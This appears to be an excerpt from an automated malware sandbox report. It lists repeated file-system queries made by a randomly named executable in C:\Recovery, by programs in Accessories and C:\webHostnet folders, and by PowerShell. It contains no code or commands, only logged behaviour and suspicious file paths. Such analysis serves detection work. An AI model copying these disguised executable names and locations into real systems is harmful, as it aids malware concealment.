                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe VolumeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeQueries volume information: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe VolumeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeQueries volume information: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe VolumeInformation
                                    Source: C:\webHostnet\MsPortSavesruntime.exeQueries volume information: C:\webHostnet\MsPortSavesruntime.exe VolumeInformation
                                    Source: C:\webHostnet\MsPortSavesruntime.exeQueries volume information: C:\webHostnet\MsPortSavesruntime.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
